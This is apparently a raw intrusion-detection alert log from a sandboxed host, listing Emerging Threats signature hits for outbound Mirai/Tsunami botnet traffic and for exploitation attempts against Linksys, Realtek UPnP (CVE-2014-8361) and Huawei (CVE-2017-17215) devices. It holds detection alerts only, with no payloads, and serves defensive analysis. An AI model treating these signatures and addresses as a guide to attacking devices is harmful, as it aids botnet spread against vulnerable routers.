                192.168.2.23172.65.89.23448884555552027153 05/14/22-02:12:00.125203TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4888455555192.168.2.23172.65.89.234
                192.168.2.2395.57.98.21044138802027121 05/14/22-02:13:14.994328TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4413880192.168.2.2395.57.98.210
                192.168.2.2395.110.232.9756464802027121 05/14/22-02:11:55.012285TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5646480192.168.2.2395.110.232.97
                192.168.2.2395.8.72.19347014802027121 05/14/22-02:11:55.040749TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4701480192.168.2.2395.8.72.193
                192.168.2.2395.47.97.7036228802027121 05/14/22-02:12:03.534557TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3622880192.168.2.2395.47.97.70
                192.168.2.23172.65.37.24335642555552027153 05/14/22-02:12:06.228008TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3564255555192.168.2.23172.65.37.243
                192.168.2.2395.182.120.23638966802027121 05/14/22-02:11:50.412772TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3896680192.168.2.2395.182.120.236
                192.168.2.23172.65.10.053968555552027153 05/14/22-02:12:11.587321TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5396855555192.168.2.23172.65.10.0
                192.168.2.2395.154.112.12243126802027121 05/14/22-02:12:24.008186TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4312680192.168.2.2395.154.112.122
                192.168.2.2395.100.203.4046200802027121 05/14/22-02:12:36.296341TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4620080192.168.2.2395.100.203.40
                192.168.2.2388.99.143.5535064802027121 05/14/22-02:12:39.835523TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3506480192.168.2.2388.99.143.55
                192.168.2.2395.134.255.2857518802027121 05/14/22-02:11:48.410937TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5751880192.168.2.2395.134.255.28
                192.168.2.23156.226.106.12749420528692027339 05/14/22-02:12:59.756210TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4942052869192.168.2.23156.226.106.127
                192.168.2.23156.241.77.21936828528692027339 05/14/22-02:12:37.410964TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3682852869192.168.2.23156.241.77.219
                192.168.2.2388.147.125.1157218802027121 05/14/22-02:12:43.278898TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5721880192.168.2.2388.147.125.11
                192.168.2.2395.159.31.9139228802027121 05/14/22-02:12:57.701159TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3922880192.168.2.2395.159.31.91
                192.168.2.2395.101.33.10038818802027121 05/14/22-02:11:52.573122TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3881880192.168.2.2395.101.33.100
                192.168.2.2395.100.154.14133290802027121 05/14/22-02:11:55.048182TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3329080192.168.2.2395.100.154.141
                192.168.2.2395.181.216.18039938802027121 05/14/22-02:12:08.396424TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3993880192.168.2.2395.181.216.180
                192.168.2.23172.65.239.20157596555552027153 05/14/22-02:12:36.880675TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5759655555192.168.2.23172.65.239.201
                192.168.2.2395.58.3.1548388802027121 05/14/22-02:13:22.563201TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4838880192.168.2.2395.58.3.15
                192.168.2.2395.57.255.13244390802027121 05/14/22-02:12:33.932176TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4439080192.168.2.2395.57.255.132
                192.168.2.2395.154.52.14257790802027121 05/14/22-02:13:00.782189TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5779080192.168.2.2395.154.52.142
                192.168.2.2395.101.95.17957846802027121 05/14/22-02:12:03.507219TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5784680192.168.2.2395.101.95.179
                192.168.2.2395.140.153.15856040802027121 05/14/22-02:12:28.223713TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5604080192.168.2.2395.140.153.158
                192.168.2.23172.65.108.14133886555552027153 05/14/22-02:12:33.795226TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3388655555192.168.2.23172.65.108.141
                192.168.2.23156.225.158.3853788528692027339 05/14/22-02:12:20.524009TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5378852869192.168.2.23156.225.158.38
                192.168.2.23156.250.15.17939434528692027339 05/14/22-02:12:33.756550TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3943452869192.168.2.23156.250.15.179
                192.168.2.2395.101.50.16159636802027121 05/14/22-02:12:12.544980TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5963680192.168.2.2395.101.50.161
                192.168.2.2395.217.114.19941138802027121 05/14/22-02:12:33.730021TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4113880192.168.2.2395.217.114.199
                192.168.2.2395.21.50.339374802027121 05/14/22-02:12:04.793956TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3937480192.168.2.2395.21.50.3
                192.168.2.23172.65.99.15639658555552027153 05/14/22-02:12:07.296438TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3965855555192.168.2.23172.65.99.156
                192.168.2.2395.65.49.5341268802027121 05/14/22-02:12:31.453562TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4126880192.168.2.2395.65.49.53
                192.168.2.23172.65.161.25046236555552027153 05/14/22-02:12:11.570256TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4623655555192.168.2.23172.65.161.250
                192.168.2.2395.183.206.250534802027121 05/14/22-02:12:12.345070TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5053480192.168.2.2395.183.206.2
                192.168.2.23172.65.29.14935424555552027153 05/14/22-02:13:03.185493TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3542455555192.168.2.23172.65.29.149
                192.168.2.2395.56.57.11935020802027121 05/14/22-02:13:09.123139TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3502080192.168.2.2395.56.57.119
                192.168.2.23172.65.3.12749930555552027153 05/14/22-02:13:09.596926TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4993055555192.168.2.23172.65.3.127
                192.168.2.2395.101.190.17742846802027121 05/14/22-02:12:12.333017TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4284680192.168.2.2395.101.190.177
                192.168.2.2395.216.136.10545390802027121 05/14/22-02:12:38.435082TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4539080192.168.2.2395.216.136.105
                192.168.2.2395.100.227.17041112802027121 05/14/22-02:12:12.383299TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4111280192.168.2.2395.100.227.170
                192.168.2.2395.30.250.18660900802027121 05/14/22-02:12:41.134897TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6090080192.168.2.2395.30.250.186
                192.168.2.2395.110.219.25258002802027121 05/14/22-02:12:06.988408TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5800280192.168.2.2395.110.219.252
                192.168.2.23156.250.93.9246958528692027339 05/14/22-02:12:13.854287TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4695852869192.168.2.23156.250.93.92
                192.168.2.23172.65.179.13846560555552027153 05/14/22-02:13:25.217133TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4656055555192.168.2.23172.65.179.138
                192.168.2.2395.130.158.8946304802027121 05/14/22-02:11:48.322037TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4630480192.168.2.2395.130.158.89
                192.168.2.23172.65.196.4033988555552027153 05/14/22-02:12:00.108181TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3398855555192.168.2.23172.65.196.40
                192.168.2.2395.56.15.14946206802027121 05/14/22-02:12:33.933501TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4620680192.168.2.2395.56.15.149
                192.168.2.2395.164.211.13740294802027121 05/14/22-02:12:23.952380TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4029480192.168.2.2395.164.211.137
                192.168.2.2395.59.240.14948520802027121 05/14/22-02:11:58.029242TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4852080192.168.2.2395.59.240.149
                192.168.2.2395.179.190.9935494802027121 05/14/22-02:11:48.314156TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3549480192.168.2.2395.179.190.99
                192.168.2.2395.183.11.24036174802027121 05/14/22-02:11:52.658094TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3617480192.168.2.2395.183.11.240
                192.168.2.2395.216.24.12135232802027121 05/14/22-02:12:18.537644TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3523280192.168.2.2395.216.24.121
                192.168.2.23197.214.98.18056372372152835222 05/14/22-02:12:31.482188TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5637237215192.168.2.23197.214.98.180
                192.168.2.2395.130.253.2236174802027121 05/14/22-02:11:57.640340TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3617480192.168.2.2395.130.253.22
                192.168.2.23172.65.96.4351198555552027153 05/14/22-02:13:43.804838TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5119855555192.168.2.23172.65.96.43
                192.168.2.2395.250.149.8654382802027121 05/14/22-02:12:38.401526TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5438280192.168.2.2395.250.149.86
                192.168.2.23172.65.63.12143308555552027153 05/14/22-02:13:00.154647TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4330855555192.168.2.23172.65.63.121
                192.168.2.2395.217.58.15941126802027121 05/14/22-02:12:01.397400TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4112680192.168.2.2395.217.58.159
                192.168.2.2395.6.91.3641418802027121 05/14/22-02:12:07.016180TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4141880192.168.2.2395.6.91.36
                192.168.2.2395.111.197.18852578802027121 05/14/22-02:12:34.070826TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5257880192.168.2.2395.111.197.188
                192.168.2.2388.83.108.14946180802027121 05/14/22-02:13:39.640695TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4618080192.168.2.2388.83.108.149
                192.168.2.2395.227.161.2454070802027121 05/14/22-02:13:29.632794TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5407080192.168.2.2395.227.161.24
                192.168.2.2395.255.117.23858354802027121 05/14/22-02:12:53.425616TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5835480192.168.2.2395.255.117.238
                192.168.2.2395.179.234.3754506802027121 05/14/22-02:12:07.018103TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5450680192.168.2.2395.179.234.37
                192.168.2.2395.9.225.10248152802027121 05/14/22-02:11:48.334081TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4815280192.168.2.2395.9.225.102
                192.168.2.2395.164.218.19550980802027121 05/14/22-02:11:52.750159TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5098080192.168.2.2395.164.218.195
                192.168.2.23172.65.248.24245400555552027153 05/14/22-02:13:08.573609TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4540055555192.168.2.23172.65.248.242
                192.168.2.2395.238.139.1348666802027121 05/14/22-02:12:25.914760TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4866680192.168.2.2395.238.139.13
                192.168.2.2395.179.247.15952292802027121 05/14/22-02:12:04.767954TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5229280192.168.2.2395.179.247.159
                192.168.2.23172.65.47.23260828555552027153 05/14/22-02:12:26.254915TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6082855555192.168.2.23172.65.47.232
                192.168.2.2388.208.78.17954476802027121 05/14/22-02:13:11.528734TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5447680192.168.2.2388.208.78.179
                192.168.2.2395.155.229.23450038802027121 05/14/22-02:12:47.723727TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5003880192.168.2.2395.155.229.234
                192.168.2.2395.101.33.10038886802027121 05/14/22-02:11:53.949765TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3888680192.168.2.2395.101.33.100
                192.168.2.2395.159.55.21435902802027121 05/14/22-02:13:17.206694TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3590280192.168.2.2395.159.55.214
                192.168.2.2395.163.12.16845128802027121 05/14/22-02:12:38.483919TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4512880192.168.2.2395.163.12.168
                192.168.2.23156.238.47.1252070528692027339 05/14/22-02:12:00.693831TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5207052869192.168.2.23156.238.47.12
                192.168.2.2395.80.200.20139330802027121 05/14/22-02:12:36.296587TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3933080192.168.2.2395.80.200.201
                192.168.2.23156.254.110.8237370528692027339 05/14/22-02:13:45.786874TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3737052869192.168.2.23156.254.110.82
                192.168.2.2395.154.210.9359854802027121 05/14/22-02:11:45.992850TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5985480192.168.2.2395.154.210.93
                192.168.2.2395.100.125.8853800802027121 05/14/22-02:12:25.889391TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5380080192.168.2.2395.100.125.88
                192.168.2.23172.65.48.14949556555552027153 05/14/22-02:12:40.957123TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4955655555192.168.2.23172.65.48.149
                192.168.2.23172.65.35.23239748555552027153 05/14/22-02:12:51.437608TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3974855555192.168.2.23172.65.35.232
                192.168.2.23156.247.19.19837608528692027339 05/14/22-02:12:24.973762TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3760852869192.168.2.23156.247.19.198
                192.168.2.2395.154.49.5858606802027121 05/14/22-02:12:28.144267TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5860680192.168.2.2395.154.49.58
                192.168.2.2395.223.48.4155004802027121 05/14/22-02:11:45.963936TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5500480192.168.2.2395.223.48.41
                192.168.2.23172.65.74.11136330555552027153 05/14/22-02:13:08.554571TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3633055555192.168.2.23172.65.74.111
                192.168.2.2395.217.212.15044942802027121 05/14/22-02:12:06.989043TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4494280192.168.2.2395.217.212.150
                192.168.2.2395.58.2.16337560802027121 05/14/22-02:13:23.571844TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3756080192.168.2.2395.58.2.163
                192.168.2.23156.226.87.8944194528692027339 05/14/22-02:13:39.931274TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4419452869192.168.2.23156.226.87.89
                192.168.2.2395.211.210.5351742802027121 05/14/22-02:12:12.345964TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5174280192.168.2.2395.211.210.53
                192.168.2.2395.217.237.9747216802027121 05/14/22-02:12:33.770644TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4721680192.168.2.2395.217.237.97
                192.168.2.23172.65.239.8641954555552027153 05/14/22-02:12:16.079208TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4195455555192.168.2.23172.65.239.86
                192.168.2.2395.211.229.20751322802027121 05/14/22-02:12:31.379545TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5132280192.168.2.2395.211.229.207
                192.168.2.2395.101.154.15835774802027121 05/14/22-02:12:38.368211TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3577480192.168.2.2395.101.154.158
                192.168.2.2395.154.100.7638420802027121 05/14/22-02:12:13.843893TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3842080192.168.2.2395.154.100.76
                192.168.2.23172.65.169.10939674555552027153 05/14/22-02:12:39.774899TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3967455555192.168.2.23172.65.169.109
                192.168.2.23172.65.231.233364555552027153 05/14/22-02:13:09.597097TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3336455555192.168.2.23172.65.231.2
                192.168.2.2395.57.97.6840424802027121 05/14/22-02:13:39.679280TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4042480192.168.2.2395.57.97.68
                192.168.2.2395.140.152.23150056802027121 05/14/22-02:12:01.355884TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5005680192.168.2.2395.140.152.231
                192.168.2.23156.245.58.19151136528692027339 05/14/22-02:13:43.469946TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5113652869192.168.2.23156.245.58.191
                192.168.2.2395.101.97.1744422802027121 05/14/22-02:12:41.078436TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4442280192.168.2.2395.101.97.17
                192.168.2.23172.245.60.19934734555552027153 05/14/22-02:12:33.796503TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3473455555192.168.2.23172.245.60.199
                192.168.2.2395.217.167.13447040802027121 05/14/22-02:11:46.033771TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4704080192.168.2.2395.217.167.134
                192.168.2.2395.215.156.6752884802027121 05/14/22-02:12:16.318734TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5288480192.168.2.2395.215.156.67
                192.168.2.2395.101.46.19048630802027121 05/14/22-02:12:21.650694TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4863080192.168.2.2395.101.46.190
                192.168.2.2395.217.235.13641662802027121 05/14/22-02:12:33.688261TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4166280192.168.2.2395.217.235.136
                192.168.2.2395.233.89.22138802802027121 05/14/22-02:12:23.904902TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3880280192.168.2.2395.233.89.221
                192.168.2.23172.65.62.17956852555552027153 05/14/22-02:13:43.822168TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5685255555192.168.2.23172.65.62.179
                192.168.2.2395.232.143.20460296802027121 05/14/22-02:12:18.496747TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6029680192.168.2.2395.232.143.204
                192.168.2.23156.230.26.19155878528692027339 05/14/22-02:11:53.192069TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5587852869192.168.2.23156.230.26.191
                192.168.2.23172.65.94.18738124555552027153 05/14/22-02:12:18.507683TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3812455555192.168.2.23172.65.94.187
                192.168.2.23172.65.128.154408555552027153 05/14/22-02:12:33.812550TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5440855555192.168.2.23172.65.128.1
                192.168.2.2398.156.215.14960094555552027153 05/14/22-02:12:39.490306TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6009455555192.168.2.2398.156.215.149
                192.168.2.23172.65.185.13355574555552027153 05/14/22-02:12:13.767472TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5557455555192.168.2.23172.65.185.133
                192.168.2.23172.65.84.3757214555552027153 05/14/22-02:13:39.278830TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5721455555192.168.2.23172.65.84.37
                192.168.2.23172.65.96.15238076555552027153 05/14/22-02:12:00.125302TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3807655555192.168.2.23172.65.96.152
                192.168.2.2395.140.158.5644624802027121 05/14/22-02:12:04.825916TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4462480192.168.2.2395.140.158.56
                192.168.2.2395.213.221.7259042802027121 05/14/22-02:12:07.007532TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5904280192.168.2.2395.213.221.72
                192.168.2.23172.65.3.8833946555552027153 05/14/22-02:12:09.369030TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3394655555192.168.2.23172.65.3.88
                192.168.2.23172.65.122.6336554555552027153 05/14/22-02:12:36.880562TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3655455555192.168.2.23172.65.122.63
                192.168.2.2395.137.248.14536432802027121 05/14/22-02:12:08.453059TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3643280192.168.2.2395.137.248.145
                192.168.2.23172.245.90.17253412555552027153 05/14/22-02:12:57.186108TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5341255555192.168.2.23172.245.90.172
                192.168.2.23172.65.214.13053118555552027153 05/14/22-02:11:51.219527TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5311855555192.168.2.23172.65.214.130
                192.168.2.2395.241.12.22138544802027121 05/14/22-02:11:55.060172TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3854480192.168.2.2395.241.12.221
                192.168.2.23172.65.182.18248080555552027153 05/14/22-02:13:35.706960TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4808055555192.168.2.23172.65.182.182
                192.168.2.23172.65.121.9241308555552027153 05/14/22-02:12:09.369123TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4130855555192.168.2.23172.65.121.92
                192.168.2.2395.101.184.23233834802027121 05/14/22-02:12:21.652251TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3383480192.168.2.2395.101.184.232
                192.168.2.23156.232.88.7134042528692027339 05/14/22-02:13:40.087312TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3404252869192.168.2.23156.232.88.71
                192.168.2.23172.65.178.4134822555552027153 05/14/22-02:12:03.763652TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3482255555192.168.2.23172.65.178.41
                192.168.2.2388.247.218.18357044802027121 05/14/22-02:12:45.593968TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5704480192.168.2.2388.247.218.183
                192.168.2.23172.65.69.9639336555552027153 05/14/22-02:12:07.296304TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3933655555192.168.2.23172.65.69.96
                192.168.2.2395.101.179.12147784802027121 05/14/22-02:12:31.371567TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4778480192.168.2.2395.101.179.121
                192.168.2.23156.224.24.20137358528692027339 05/14/22-02:12:48.476728TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3735852869192.168.2.23156.224.24.201
                192.168.2.2395.6.51.10858676802027121 05/14/22-02:12:23.988881TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5867680192.168.2.2395.6.51.108
                192.168.2.23172.65.85.10737946555552027153 05/14/22-02:13:35.724142TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3794655555192.168.2.23172.65.85.107
                192.168.2.23172.65.254.1054364555552027153 05/14/22-02:11:51.219793TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5436455555192.168.2.23172.65.254.10
                192.168.2.2395.216.233.12645134802027121 05/14/22-02:12:12.375722TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4513480192.168.2.2395.216.233.126
                192.168.2.23172.65.161.12547106555552027153 05/14/22-02:11:53.487798TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4710655555192.168.2.23172.65.161.125
                192.168.2.2395.153.16.9334294802027121 05/14/22-02:11:52.636220TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3429480192.168.2.2395.153.16.93
                192.168.2.2395.216.46.16342972802027121 05/14/22-02:11:46.033701TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4297280192.168.2.2395.216.46.163
                192.168.2.2395.38.149.7653014802027121 05/14/22-02:12:31.524055TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5301480192.168.2.2395.38.149.76
                192.168.2.2395.79.118.17840476802027121 05/14/22-02:11:57.971047TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4047680192.168.2.2395.79.118.178
                192.168.2.2388.249.29.11953336802027121 05/14/22-02:13:46.157357TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5333680192.168.2.2388.249.29.119
                192.168.2.23172.65.68.14050106555552027153 05/14/22-02:12:34.813598TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5010655555192.168.2.23172.65.68.140
                192.168.2.2388.221.77.4548254802027121 05/14/22-02:13:08.856075TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4825480192.168.2.2388.221.77.45
                192.168.2.2395.15.240.18036256802027121 05/14/22-02:12:57.841983TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3625680192.168.2.2395.15.240.180
                192.168.2.2388.145.17.11850038802027121 05/14/22-02:12:39.860168TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5003880192.168.2.2388.145.17.118
                192.168.2.2395.137.248.6544254802027121 05/14/22-02:11:52.623905TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4425480192.168.2.2395.137.248.65
                192.168.2.2395.140.37.16651080802027121 05/14/22-02:12:12.365029TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5108080192.168.2.2395.140.37.166
                192.168.2.23172.65.9.938206555552027153 05/14/22-02:13:05.459841TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3820655555192.168.2.23172.65.9.9
                192.168.2.2395.217.81.20448500802027121 05/14/22-02:12:06.989141TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4850080192.168.2.2395.217.81.204
                192.168.2.2395.112.170.4958398802027121 05/14/22-02:12:53.415920TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5839880192.168.2.2395.112.170.49
                192.168.2.23172.255.80.23550844555552027153 05/14/22-02:12:37.003666TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5084455555192.168.2.23172.255.80.235
                192.168.2.2395.58.115.23438118802027121 05/14/22-02:13:01.036403TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3811880192.168.2.2395.58.115.234
                192.168.2.2395.57.36.24550622802027121 05/14/22-02:12:41.043513TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5062280192.168.2.2395.57.36.245
                192.168.2.2395.217.183.13159274802027121 05/14/22-02:11:50.400173TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5927480192.168.2.2395.217.183.131
                192.168.2.2395.42.196.18045740802027121 05/14/22-02:12:31.450640TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4574080192.168.2.2395.42.196.180
                192.168.2.23172.65.10.5133430555552027153 05/14/22-02:12:33.795333TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3343055555192.168.2.23172.65.10.51
                192.168.2.2388.250.111.14434764802027121 05/14/22-02:13:06.536692TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3476480192.168.2.2388.250.111.144
                192.168.2.23172.65.79.23133478555552027153 05/14/22-02:12:16.062298TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3347855555192.168.2.23172.65.79.231
                192.168.2.2395.155.16.12139454802027121 05/14/22-02:12:31.388864TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3945480192.168.2.2395.155.16.121
                192.168.2.2395.179.219.13753258802027121 05/14/22-02:12:25.915169TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5325880192.168.2.2395.179.219.137
